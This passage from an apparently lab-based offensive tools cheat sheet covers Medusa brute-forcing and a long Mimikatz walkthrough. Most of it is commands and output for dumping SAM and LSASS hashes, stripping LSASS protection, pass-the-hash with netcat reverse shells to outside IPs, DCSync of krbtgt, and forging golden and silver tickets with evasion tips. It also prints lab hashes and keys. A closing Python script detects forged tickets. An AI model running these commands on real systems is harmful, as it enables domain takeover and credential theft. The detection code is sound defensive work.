      + wrapper.mod : Generic Wrapper Module : version 2.0
    
    
    
    Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
    -h [TEXT]    : Target hostname or IP address
    -H [FILE]    : File containing target hostnames or IP addresses
    -u [TEXT]    : Username to test
    -U [FILE]    : File containing usernames to test
    -p [TEXT]    : Password to test
    -P [FILE]    : File containing passwords to test
    -C [FILE]    : File containing combo entries. See README for more information.
    -O [FILE]    : File to append log information to
    -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
    -M [TEXT]    : Name of the module to execute (without the .mod extension)
    -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                   different parameter each time and they will all be sent to the module (i.e.
                   -m Param1 -m Param2, etc.)
    -d           : Dump all known modules
    -n [NUM]     : Use for non-default TCP port number
    -s           : Enable SSL
    -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
    -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
    -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
    -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).
    -t [NUM]     : Total number of logins to be tested concurrently
    -T [NUM]     : Total number of hosts to be tested concurrently
    -L           : Parallelize logins using one username per thread. The default is to process 
                   the entire username before proceeding.
    -f           : Stop scanning host after first valid username/password found.
    -F           : Stop audit after first valid username/password found on any host.
    -b           : Suppress startup banner
    -q           : Display module's usage information
    -v [NUM]     : Verbose level [0 - 6 (more)]
    -w [NUM]     : Error debug level [0 - 10 (more)]
    -V           : Display version
    -Z [TEXT]    : Resume scan based on map of previous scan
    
    
  • Output Example:

    Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
    
    ACCOUNT CHECK: [ftp] Host: 10.10.144.205 (1 of 1, 0 complete) User: ftp (1 of 1, 0 complete) Password: ftp (1 of 1 complete)
    ACCOUNT FOUND: [ftp] Host: 10.10.144.205 User: ftp Password: ftp [SUCCESS]
    
    
    
    [...]
    ACCOUNT CHECK: [ssh] Host: 10.10.81.19 (1 of 1, 0 complete) User: burgess (3 of 5, 1 complete) Password: Fall2020@ (17 of 40 complete)  
    ACCOUNT FOUND: [ssh] Host: 10.10.81.19 User: burgess Password: Fall2021@ [SUCCESS]
    ACCOUNT CHECK: [ssh] Host: 10.10.81.19 (1 of 1, 0 complete) User: phillips (2 of 5, 2 complete) Password: Fall2020$ (37 of 40 complete)
    [...]
    
    

13. Mimikatz

  • Use Case: Credential dumping (local SAM, LSASS memory), Kerberos ticket extraction and forgery (pass-the-ticket, golden and silver tickets), pass-the-hash / overpass-the-hash / pass-the-key, DCSync, and certificate and vault extraction. GitHub: https://github.com/gentilkiwi/mimikatz

  • Input Example:

    # Extracting NTLM hashes from local SAM
    privilege::debug
    token::elevate
    lsadump::sam
    
    # Extracting NTLM hashes from LSASS memory (MSV only)
    sekurlsa::msv
    
    # Extracting NTLM hashes from LSASS memory (all data)
    sekurlsa::logonpasswords
    
    # Extracting LSASS hashes when LSASS runs as a protected process (RunAsPPL): load the mimidrv kernel driver (!+) and strip the protection. This needs local admin and is noisy (a new service and a loaded driver).
    mimikatz # sekurlsa::logonpasswords
    ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
    
    mimikatz # !+
    [*] 'mimidrv' service not present
    [+] 'mimidrv' service successfully registered
    [+] 'mimidrv' service ACL to everyone
    [+] 'mimidrv' service started
    
    mimikatz #
    mimikatz # !processprotect /process:lsass.exe /remove
    Process : lsass.exe
    PID 836 -> 00/00 [0-0-0]
    
    mimikatz #  
    
    
    # Revert to our original token first: sekurlsa::pth does not work from the elevated token obtained with token::elevate.
    token::revert
    
    # With PtH, any command run in the shell caught on the listener (10.50.46.84:5555) authenticates over the network as bob.jenkins. The hash is injected only into the new process's logon session; locally, whoami still shows the original user.
    sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe 10.50.46.84 5555"  
    
    # Prepare for pass-the-ticket attack
    sekurlsa::tickets /export
    
    # Execute pass-the-ticket attack
    kerberos::ptt [0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
    
    * File: '[0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi': OK
    
    mimikatz #
    
    
    # Check DC-Sync rights
    lsadump::dcsync /user:Administrator
    
    # Extract the krbtgt NTLM hash
    lsadump::dcsync /user:krbtgt
    
    # Create a golden ticket
    kerberos::golden /user:Administrator /domain:CONTROLLER.LOCAL /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500 /groups:512 /ptt
    
    # /endin and /renewmax are in minutes: this ticket expires after 600 minutes (10 hours) and is renewable for up to 10080 minutes (7 days), matching the default domain policy instead of mimikatz's 10-year default, which stands out in ticket listings and security events.
    # The impersonated username does not have to be a valid account: the KDC trusts the PAC, and /id:500 is what grants the built-in Administrator's RID.
    kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM hash of KRBTGT account> /endin:600 /renewmax:10080 /ptt
    
    # Confirm the Golden Ticket was successfully created and injected
    kerberos::list
    
    # Generate a Silver ticket for the CIFS service. A silver ticket must be encrypted with the key of the account that runs the targeted service; for CIFS that is the target's computer account, so /rc4: takes that machine account's NTLM hash. No contact with the DC is needed.
    kerberos::golden /admin:StillNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
    
    # DC-Sync All
    lsadump::dcsync /domain:controller.local /all
    
    # Prepare for Overpass-the-hash and Pass-the-key  
    sekurlsa::ekeys
    
    # Pass-the-key attack
    # Note the use of the aes256 key
    sekurlsa::pth /user:Administrator /domain:controller.local /aes256:42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 /run:"c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5556"
    
    # Overpass-the-hash attack
    # Note the use of the RC4 key, which is simply the NTLM hash
    
    sekurlsa::pth /user:Administrator /domain:controller.local /rc4:2777b7fec870e04dda00cd7260f7bee6 /run:"c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5557"
    
    # Patch CryptoAPI (CAPI) and CNG key isolation in memory so that private keys marked non-exportable can be exported
    mimikatz # privilege::debug
    Privilege '20' OK
    
    mimikatz # crypto::capi
    Local CryptoAPI RSA CSP patched
    Local CryptoAPI DSS CSP patched
    
    mimikatz # crypto::cng
    "KeyIso" service patched
    
    mimikatz #
    
    # Export certificates
    
    crypto::certificates /systemstore:local_machine /export
    
    # Enumerate stored credentials
    vault::list
    
    
  • Output Example:

    # Extracting NTLM hashes from local SAM
    
    Privilege '20' OK
    ----------------------------------
    Token Id  : 0                                                                                                                   
    User name :                                                                                                                     
    SID name  : NT AUTHORITY\SYSTEM                                                                                                 
    
    664     {0;000003e7} 1 D 17764          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary                         
     -> Impersonated !                                                                                                              
     * Process Token : {0;001b7659} 0 D 1802104     ZA\t2_felicia.dean      S-1-5-21-3330634377-1326264276-632209373-4605   (12g,24p)       Primary  
     * Thread Token  : {0;000003e7} 1 D 1856143     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)                 
    ------------------------------------
    Domain : THMJMP2                                                                                                                
    SysKey : 2e27b23479e1fb1161a839f9800119eb                                                                                       
    Local SID : S-1-5-21-1946626518-647761240-1897539217                                                                            
    
    SAMKey : 9a74a253f756d6b012b7ee3d0436f77a                                                                                       
    
    RID  : 000001f4 (500)                                                                                                           
    User : Administrator                                                                                                            
      Hash NTLM: 0b2571be7e75e3dbd169ca5352a2dad7                                                                                   
    
    RID  : 000001f5 (501)                                                                                                           
    User : Guest                                                                                                                    
    
    RID  : 000001f7 (503)                                                                                                           
    User : DefaultAccount
    
    
    # Extracting NTLM hashes from LSASS memory (MSV only)
    Authentication Id : 0 ; 1024616 (00000000:000fa268)                                                                             
    Session           : RemoteInteractive from 7                                                                                    
    User Name         : t1_toby.beck4                                                                                               
    Domain            : ZA                                                                                                          
    Logon Server      : THMDC                                                                                                       
    Logon Time        : 10/15/2025 12:49:48 PM                                                                                      
    SID               : S-1-5-21-3330634377-1326264276-632209373-4619                                                               
          msv :                                                                                                                   
           [00000003] Primary                                                                                                     
           * Username : t1_toby.beck4                                                                                             
           * Domain   : ZA                                                                                                        
           * NTLM     : 533f1bd576caa912bdb9da284bbc60fe                                                                          
           * SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38                                                                  
           * DPAPI    : 47d511de8e208dc0053e88223dcdd31c                                                                          
    
    Authentication Id : 0 ; 1020026 (00000000:000f907a)                                                                             
    Session           : Interactive from 7                                                                                          
    User Name         : DWM-7                                                                                                       
    Domain            : Window Manager                                                                                              
    Logon Server      : (null)                                                                                                      
    Logon Time        : 10/15/2025 12:49:48 PM                                                                                      
    SID               : S-1-5-90-0-7                                                                                                
          msv :                                                                                                                   
           [00000003] Primary                                                                                                     
           * Username : THMJMP2$                                                                                                  
           * Domain   : ZA                                                                                                        
           * NTLM     : 894c4a1dba8abfcbc88b46e7c8da319a                                                                          
           * SHA1     : 6b57d16c54982776f3a96978d854e6d912b9844f                                                                                                                                                             
    
    
    [...]
    # Extracting NTLM hashes from LSASS memory (all data)
    Authentication Id : 0 ; 584937 (00000000:0008ece9)                                                                              
    Session           : Interactive from 3                                                                                          
    User Name         : DWM-3                                                                                                       
    Domain            : Window Manager                                                                                              
    Logon Server      : (null)                                                                                                      
    Logon Time        : 10/15/2025 12:49:04 PM                                                                                      
    SID               : S-1-5-90-0-3                                                                                                
          msv :                                                                                                                   
           [00000003] Primary                                                                                                     
           * Username : THMJMP2$                                                                                                  
           * Domain   : ZA                                                                                                        
           * NTLM     : 894c4a1dba8abfcbc88b46e7c8da319a                                                                          
           * SHA1     : 6b57d16c54982776f3a96978d854e6d912b9844f                                                                  
          tspkg :                                                                                                                 
          wdigest :                                                                                                               
           * Username : THMJMP2$                                                                                                  
           * Domain   : ZA                                                                                                        
           * Password : (null)                                                                                                    
          kerberos :                                                                                                              
           * Username : THMJMP2$                                                                                                  
           * Domain   : za.tryhackme.com                                                                                          
           * Password : 09 59 d6 d2 07 35 80 75 25 4f b2 ab 9f 53 ba 68 28 e4 72 8d eb 1c 8f ec b2 6a 11 7e 6e d8 72 22 00 8c a0 6
    a ed 7f d6 7c 70 6c ce 61 04 9a 76 d7 2e 74 96 4b c0 2e e1 23 a0 a5 09 15 fc af 8c da 57 28 b7 83 17 d4 74 28 c1 07 5f 67 c4 8c 
    df 76 14 3e ba d6 70 3a 34 63 4c d9 e8 b3 e1 8c 18 94 c1 a5 21 01 38 b6 9d 22 07 be 45 cb ae 4d d9 00 c8 db 37 16 05 b7 14 ec 68
     11 ba 38 6a c2 23 07 c2 1c a1 fe 87 dd 02 4a 21 07 6a c7 66 26 d1 ee 18 2c 72 62 70 11 5c e5 2a 58 03 fd 8a 65 88 a0 59 9a 5b 9
    9 3a 51 40 dc 60 22 e4 7d 5d ed b2 3a e1 2c f3 c9 1e eb d5 1f e1 4e 0c 19 4e 4f 65 22 bd 1f c0 72 d6 32 1a 1e fa 1b 66 a9 2c 2c 
    06 68 23 71 0d 63 9d 9a d5 b6 dd 1d 48 0c 70 c4 3a 06 73 84 74 13 b0 be f7 37 ef c1 8e ce bb cd 34 c6                           
          ssp :                                                                                                                   
          credman :
    [...]
    
    
    # Pass-the-hash
     * Process Token : {0;0031373f} 0 D 3228104     ZA\t2_felicia.dean      S-1-5-21-3330634377-1326264276-632209373-4605   (12g,24p)      Primary
     * Thread Token  : no token
    -------------------------------------------------
    mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe 10.50.46.84 5555"
    user    : bob.jenkins                                                                                                          
    domain  : za.tryhackme.com                                                                                                     
    program : c:\tools\nc64.exe -e cmd.exe 10.50.46.84 5555                                                                        
    impers. : no                                                                                                                   
    NTLM    : 6b4a57f67805a663c818106dc0648484                                                                                     
      |  PID  5780                                                                                                                 
      |  TID  9148                                                                                                                 
      |  LSA Process is now R/W                                                                                                    
      |  LUID 0 ; 3365485 (00000000:00335a6d)                                                                                      
      \_ msv1_0   - data copy @ 000001490C409A50 : OK !                                                                            
      \_ kerberos - data copy @ 000001490CE87138                                                                                   
       \_ aes256_hmac       -> null                                                                                                
       \_ aes128_hmac       -> null                                                                                                
       \_ rc4_hmac_nt       OK                                                                                                     
       \_ rc4_hmac_old      OK                                                                                                     
       \_ rc4_md4           OK                                                                                                     
       \_ rc4_hmac_nt_exp   OK                                                                                                     
       \_ rc4_hmac_old_exp  OK                                                                                                     
       \_ *Password replace @ 000001490CE7A188 (32) -> null
    
    
    # Prepare for Pass-the-ticket
    mimikatz # sekurlsa::tickets /export
    [...]
    
    Authentication Id : 0 ; 996 (00000000:000003e4)
    Session           : Service from 0
    User Name         : CONTROLLER-1$
    Domain            : CONTROLLER
    Logon Server      : (null)
    Logon Time        : 10/22/2025 6:10:56 AM
    SID               : S-1-5-20
    
           * Username : controller-1$
           * Domain   : CONTROLLER.LOCAL
           * Password : (null)
    
          Group 0 - Ticket Granting Service
           [00000000]
             Start/End/MaxRenew: 10/22/2025 6:41:02 AM ; 10/22/2025 4:41:02 PM ; 10/29/2025 6:41:02 AM
             Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL
             Target Name  (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL
             Client Name  (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL )
             Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
             Session Key       : 0x00000012 - aes256_hmac
               a282e2cf28b04ff613687f4d7de574c39a454a497f3b59ffd8e640be6a8a815c
             Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5        [...]
             * Saved to file [0;3e4]-0-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi !
    
          Group 1 - Client Ticket ?
    
          Group 2 - Ticket Granting Ticket
           [00000000]
             Start/End/MaxRenew: 10/22/2025 6:41:02 AM ; 10/22/2025 4:41:02 PM ; 10/29/2025 6:41:02 AM
             Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
             Target Name  (02) : krbtgt ; CONTROLLER.local ; @ CONTROLLER.LOCAL
             Client Name  (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.local )
             Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
             Session Key       : 0x00000012 - aes256_hmac
               f833395fefa76f87d2ac6e5027a1f3551807a49e212d4e83a10d1fd8318ff919
             Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
             * Saved to file [0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi !
    
    [...]
    
    Authentication Id : 0 ; 418733 (00000000:000663ad)
    Session           : Network from 0
    User Name         : CONTROLLER-1$
    Domain            : CONTROLLER
    Logon Server      : (null)
    Logon Time        : 10/22/2025 6:16:17 AM
    SID               : S-1-5-18
    
           * Username : CONTROLLER-1$
           * Domain   : CONTROLLER.LOCAL
           * Password : (null)
    
          Group 0 - Ticket Granting Service
    
          Group 1 - Client Ticket ?
           [00000000]
             Start/End/MaxRenew: 10/22/2025 6:11:35 AM ; 10/22/2025 4:11:35 PM ;
             Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL
             Target Name  (--) : @ CONTROLLER.LOCAL
             Client Name  (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL
             Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
             Session Key       : 0x00000012 - aes256_hmac
               428da5713fa16eaa1a9722b93ab4f89c58e13dc92bacec20579f82b3fdd1c299
             Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5        [...]
             * Saved to file [0;663ad]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi !
    
          Group 2 - Ticket Granting Ticket
    
    [...]
    mimikatz #
    
    

    1. Logon type: Service vs Network

    • The first session above (Authentication Id 0x3e4, "Service from 0", SID S-1-5-20) is the built-in NETWORK SERVICE logon, which authenticates to the domain as the computer account CONTROLLER-1$. Service logons like this exist for as long as the host is up, so their TGT is renewed automatically and stays resident in LSASS.
    • The second session (Authentication Id 0x663ad, "Network from 0") is a network logon (type 3): a client authenticated to this host with a service ticket, so only the "Client Ticket" group is populated and there is no TGT in it (unless unconstrained delegation forwarded one). Network logons are transient and hard to reuse.

    2. Ticket types

    • The first session holds both:
      • A TGT (krbtgt): reusable for Pass-the-Ticket until its End time (10 hours here, renewable for 7 days).
      • A TGS for LDAP on the DC: useful for LDAP enumeration of Active Directory.
    • CONTROLLER-1 is the domain controller (the dcsync output further down selects it as the DC server), so its computer account carries directory replication rights and this TGT alone is enough for the lsadump::dcsync commands that follow.

    # Confirm pass-the-ticket worked
    C:\Users\Administrator\Downloads>klist
    
    Current LogonId is 0:0x2db899
    
    Cached Tickets: (1)
    
    #0>     Client: CONTROLLER-1$ @ CONTROLLER.LOCAL
          Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
          KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
          Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
          Start Time: 10/22/2025 6:41:02 (local)
          End Time:   10/22/2025 16:41:02 (local)
          Renew Time: 10/29/2025 6:41:02 (local)
          Session Key Type: AES-256-CTS-HMAC-SHA1-96
          Cache Flags: 0x1 -> PRIMARY
          Kdc Called:
    
    C:\Users\Administrator\Downloads>
    
    

    Why This Ticket Is Ideal for PTT

    • Client: CONTROLLER-1$, the computer account of the domain controller itself. A DC's computer account holds directory replication rights, which is exactly what the DCSync commands that follow rely on.
    • Server: krbtgt/CONTROLLER.LOCAL confirms this is a Ticket Granting Ticket (TGT); it can be exchanged for service tickets to anything in the domain.
    • Encryption: AES-256-CTS-HMAC-SHA1-96, the etype the KDC issues to every modern client, so the ticket blends in where an RC4 ticket would stand out.
    • Flags: forwardable, renewable, initial, pre_authent, name_canonicalize. initial and name_canonicalize mark a TGT the KDC really issued (forged tickets typically lack name_canonicalize), while forwardable and renewable let it be delegated and renewed.
    • Session Key: present and valid; without it the current logon session could not use the ticket in TGS requests.
    • Cache Flags: PRIMARY, so this ticket is now the active TGT of the current logon session.
    • Caveat: it is only valid until End Time (10 hours here) and renewable until Renew Time (7 days); after that a new TGT needs either the account's key (sekurlsa::ekeys below) or the krbtgt key (golden ticket).

    # Check DC-Sync rights
    mimikatz # lsadump::dcsync /user:Administrator
    [DC] 'CONTROLLER.local' will be the domain
    [DC] 'CONTROLLER-1.CONTROLLER.local' will be the DC server
    [DC] 'Administrator' will be the user account
    
    Object RDN           : Administrator
    
    ** SAM ACCOUNT **
    
    SAM Username         : Administrator
    Account Type         : 30000000 ( USER_OBJECT )
    User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
    Account expiration   :
    Password last change : 5/25/2020 12:22:39 PM
    Object Security ID   : S-1-5-21-432953485-3795405108-1502158860-500
    Object Relative ID   : 500
    
    Credentials:
      Hash NTLM: 2777b7fec870e04dda00cd7260f7bee6
    
    Supplemental Credentials:
    * Primary:NTLM-Strong-NTOWF *
      Random Value : 7bfd4ae86442827fb0db294d5c9855ce
    
    * Primary:Kerberos-Newer-Keys *
      Default Salt : WIN-G83IJFV2N03Administrator
      Default Iterations : 4096
      Credentials
        aes256_hmac       (4096) : 42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4
        aes128_hmac       (4096) : d01d6ccf97a2ee214ec7185173a3b659
        des_cbc_md5       (4096) : 918abaf7dcb02ce6
    
    * Packages *
      NTLM-Strong-NTOWF
    
    * Primary:Kerberos *
      Default Salt : WIN-G83IJFV2N03Administrator
      Credentials
        des_cbc_md5       : 918abaf7dcb02ce6
    
    mimikatz #
    
    

    What This Means

    • The DCSync request impersonated a domain controller's replication traffic (MS-DRSR GetNCChanges) and pulled the Administrator account's stored secrets over the network; nothing was read from the DC's disk.
    • The output includes:
      • NTLM hash: 2777b7fec870e04dda00cd7260f7bee6 (which is also the rc4_hmac_nt Kerberos key, see sekurlsa::ekeys below)
      • Kerberos keys: AES256, AES128 and DES, derived from the password with the salt and iteration count printed beside them, so unlike the unsalted NTLM hash they are specific to this account
      • Supplemental credentials such as NTLM-Strong-NTOWF
    • Password last change is 5/25/2020, so every one of these values has been valid for years.

    🧠 Why This Is Powerful

    With these credentials you can:

    • Pass-the-Hash with the NTLM hash, or overpass-the-hash / pass-the-key with the RC4 or AES key, to obtain Kerberos tickets as Administrator (both shown below with sekurlsa::pth)
    • Impersonate the domain admin against any service in the domain
    • Keep coming back: a stolen ticket expires, but the key lets you request a fresh TGT until the Administrator password is changed
    • Golden Tickets are a separate step: they need the krbtgt account's key, which is what the next DCSync retrieves
    
    # Extract the krbtgt NTLM hash. DCSync again impersonates a domain controller's replication request and pulls the hash over the network without touching the DC's disk.
    # Every TGT the KDC issues is encrypted, and its PAC signed, with the krbtgt account's key (the NTLM hash for RC4, or the aes256_hmac key below). Holding that key lets us forge a TGT for any identity: a GOLDEN TICKET.
    # The account shows ACCOUNTDISABLE below; that is normal. krbtgt is disabled by design but its key is used by every DC, and it only rotates when an administrator resets the krbtgt password (twice, to flush the previous key from its history).
    
    mimikatz # lsadump::dcsync /user:krbtgt
    
    [DC] 'CONTROLLER.local' will be the domain
    [DC] 'CONTROLLER-1.CONTROLLER.local' will be the DC server
    [DC] 'krbtgt' will be the user account
    
    Object RDN           : krbtgt
    
    ** SAM ACCOUNT **
    
    SAM Username         : krbtgt
    Account Type         : 30000000 ( USER_OBJECT )
    User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
    Account expiration   :
    Password last change : 5/25/2020 3:06:51 PM
    Object Security ID   : S-1-5-21-432953485-3795405108-1502158860-502
    Object Relative ID   : 502
    
    Credentials:
      Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6
        ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
        lm  - 0: aec7e106ddd23b3928f7b530f60df4b6
    
    Supplemental Credentials:
    * Primary:NTLM-Strong-NTOWF *
      Random Value : 4b9102d709aada4d56a27b6c3cd14223
    
    * Primary:Kerberos-Newer-Keys *
      Default Salt : CONTROLLER.LOCALkrbtgt
      Default Iterations : 4096
      Credentials
        aes256_hmac       (4096) : dfb518984a8965ca7504d6d5fb1cbab56d444c58ddff6c193b64fe6b6acf1033
        aes128_hmac       (4096) : 88cc87377b02a885b84fe7050f336d9b
        des_cbc_md5       (4096) : 79bf07137a8a6b8f
    
    * Primary:Kerberos *
      Default Salt : CONTROLLER.LOCALkrbtgt
      Credentials
        des_cbc_md5       : 79bf07137a8a6b8f
    
    * Packages *
      NTLM-Strong-NTOWF
    
    * Primary:WDigest *
      01  d2e9aa3caa4509c3f11521c70539e4ad
      02  c9a868fc195308b03d72daa4a5a4ee47
      03  171e066e448391c934d0681986f09ff4
      04  d2e9aa3caa4509c3f11521c70539e4ad
      05  c9a868fc195308b03d72daa4a5a4ee47
      06  41903264777c4392345816b7ecbf0885
      07  d2e9aa3caa4509c3f11521c70539e4ad
      08  9a01474aa116953e6db452bb5cd7dc49
      09  a8e9a6a41c9a6bf658094206b51a4ead
      10  8720ff9de506f647ad30f6967b8fe61e
      11  841061e45fdc428e3f10f69ec46a9c6d
      12  a8e9a6a41c9a6bf658094206b51a4ead
      [...]
    
    mimikatz #
    
    
    # Create a golden ticket
    mimikatz # kerberos::golden /user:Administrator /domain:CONTROLLER.LOCAL /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500 /groups:512 /ptt
    User      : Administrator
    Domain    : CONTROLLER.LOCAL (CONTROLLER)
    SID       : S-1-5-21-432953485-3795405108-1502158860
    User Id   : 500
    Groups Id : *512
    ServiceKey: 72cd714611b64cd4d5550cd2759db3f6 - rc4_hmac_nt
    Lifetime  : 10/22/2025 7:51:52 AM ; 10/20/2035 7:51:52 AM ; 10/20/2035 7:51:52 AM
    -> Ticket : ** Pass The Ticket **
    
     * PAC generated
     * PAC signed
     * EncTicketPart generated
     * EncTicketPart encrypted
     * KrbCred generated
    
    Golden ticket for 'Administrator @ CONTROLLER.LOCAL' successfully submitted for current session
    
    mimikatz #
    
    
    # Confirm the Golden Ticket was created and injected. Note the etype 0x17 (rc4_hmac_nt): the ticket was forged from the NTLM hash, so it is RC4-encrypted, carries a 10-year lifetime and lacks the name_canonicalize flag, all of which differ from the KDC-issued TGT listed earlier (0x12 aes256_hmac, 10-hour lifetime, flags 40e10000).
    [00000000] - 0x00000017 - rc4_hmac_nt
     Start/End/MaxRenew: 10/22/2025 7:51:52 AM ; 10/20/2035 7:51:52 AM ; 10/20/2035 7:51:52 AM
     Server Name       : krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
     Client Name       : Administrator @ CONTROLLER.LOCAL
     Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
    
    # Confirm the DC accepted the forged TGT (it issued a CIFS service ticket for the C$ share), which gives us administrative access to the DC
    C:\Users\Administrator\Downloads>net use \\CONTROLLER-1\C$ /user:Administrator
    The command completed successfully.
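
The two ticket listings on this page differ in ways a defender can key on: the KDC-issued TGT (aes256_hmac, 10-hour lifetime, flags 40e10000 including name_canonicalize) against the injected golden ticket (rc4_hmac_nt, 10-year lifetime, flags 40e00000). The following Python, an added example that is neither mimikatz nor page code, parses kerberos::list-style output and flags those indicators. The sample text is constructed from the two listings above (the legitimate machine-account TGT re-expressed in kerberos::list format); the 10-hour threshold is the default domain TGT lifetime and should be set to your own policy.

```python
"""Flag forged Kerberos tickets in mimikatz kerberos::list output (added example)."""
import re
from datetime import datetime, timedelta

# Constructed sample: entry 0 mirrors the KDC-issued TGT exported earlier on
# this page, entry 1 is the golden ticket injected above.
SAMPLE_KERBEROS_LIST = """
[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/22/2025 6:41:02 AM ; 10/22/2025 4:41:02 PM ; 10/29/2025 6:41:02 AM
   Server Name       : krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
   Client Name       : CONTROLLER-1$ @ CONTROLLER.LOCAL
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

[00000001] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 10/22/2025 7:51:52 AM ; 10/20/2035 7:51:52 AM ; 10/20/2035 7:51:52 AM
   Server Name       : krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
   Client Name       : Administrator @ CONTROLLER.LOCAL
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
"""

ENTRY_RE = re.compile(r"^\[[0-9a-fA-F]{8}\] - 0x([0-9a-fA-F]+) - (\S+)")
TS_FMT = "%m/%d/%Y %I:%M:%S %p"
TGT_MAX_LIFETIME = timedelta(hours=10)  # default domain Kerberos policy; adjust to yours
RC4_ETYPES = {0x17, 0x18}               # rc4-hmac, rc4-hmac-exp
NAME_CANONICALIZE = 0x00010000          # TicketFlags bit a Windows KDC sets for Windows clients


def parse_kerberos_list(text: str) -> list:
    """One dict per ticket entry: etype, start/end/renew_until, server, client, flags."""
    tickets = []
    for block in re.split(r"\n(?=\[[0-9a-fA-F]{8}\] - )", text.strip()):
        header = ENTRY_RE.match(block)
        if not header:
            continue
        t = {"etype": int(header.group(1), 16), "etype_name": header.group(2)}
        for line in block.splitlines()[1:]:
            key, _, value = line.strip().partition(":")
            key, value = key.strip(), value.strip()
            if key == "Start/End/MaxRenew":
                parts = [p.strip() for p in value.split(";")]
                times = [datetime.strptime(p, TS_FMT) if p else None for p in parts]
                t["start"], t["end"], t["renew_until"] = (times + [None] * 3)[:3]
            elif key == "Server Name":
                t["server"] = value
            elif key == "Client Name":
                t["client"] = value
            elif key.startswith("Flags "):
                t["flags"] = int(key.split()[1], 16)
        tickets.append(t)
    return tickets


def forged_ticket_indicators(t: dict) -> list:
    """Heuristics separating the golden ticket from the KDC-issued TGT."""
    reasons = []
    if t["server"].startswith("krbtgt/") and t["etype"] in RC4_ETYPES:
        reasons.append(f"RC4 TGT (etype 0x{t['etype']:x}) in a domain that issues AES: forged from an NTLM hash?")
    lifetime = t["end"] - t["start"]
    if lifetime > TGT_MAX_LIFETIME:
        reasons.append(f"lifetime {lifetime} exceeds the 10h TGT policy (mimikatz default is 10 years)")
    if not t["flags"] & NAME_CANONICALIZE:
        reasons.append("name_canonicalize flag missing; a Windows KDC sets it on tickets for Windows clients")
    return reasons


def scan(text: str) -> dict:
    """Map each suspicious client name to its list of indicators."""
    return {t["client"]: r for t in parse_kerberos_list(text) if (r := forged_ticket_indicators(t))}


if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_KERBEROS_LIST).items():
        print(client)
        for reason in reasons:
            print("  -", reason)
```

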